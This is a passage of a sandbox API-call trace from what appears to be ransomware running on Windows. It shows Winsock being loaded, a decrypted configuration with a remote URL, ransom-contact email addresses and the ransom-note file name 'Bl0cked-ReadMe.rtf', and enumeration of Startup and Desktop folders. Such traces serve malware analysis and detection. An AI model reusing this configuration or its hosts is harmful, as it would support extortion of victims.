[0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0096.892] GetProcAddress (hModule=0x76750000, 
lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0096.892] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0096.892] 
GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0096.892] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0096.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0096.893] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0096.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0096.893] GetProcAddress 
(hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0096.893] GetThreadLocale () returned 0x409 [0096.893] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0096.893] GetCurrentThreadId () returned 0xb78 [0096.893] GetCurrentThreadId () returned 0xb78 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0096.893] GetThreadLocale () returned 0x409 [0096.893] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0096.893] GetThreadLocale () returned 0x409 [0096.893] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0096.893] GetCurrentThreadId () returned 0xb78 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: 
lpLCData="Thursday") returned 9 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: 
lpLCData="June") returned 5 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") 
returned 2 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0096.895] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0096.899] 
GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0096.915] GetProcAddress 
(hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0096.916] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0096.922] GetACP () returned 0x4e4 [0096.922] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0096.922] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.922] GetTickCount () returned 0x2337e [0096.922] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15371160530) returned 1 [0096.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x74\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x71\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x41\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x49\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x34\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x38\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0096.923] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d 
(Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0096.923] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0096.923] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0096.923] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0096.923] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0096.923] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0096.923] LockResource (hResData=0x50d55c) returned 0x50d55c [0096.923] FreeResource (hResData=0x50d55c) returned 0 [0096.923] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.923] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.923] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.923] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.923] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0096.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.924] FreeResource (hResData=0x50d64c) returned 0 [0096.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0096.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.924] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0096.924] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0096.924] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0096.926] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0096.927] 
SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0096.928] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0096.928] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0096.929] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0096.930] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0096.930] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, 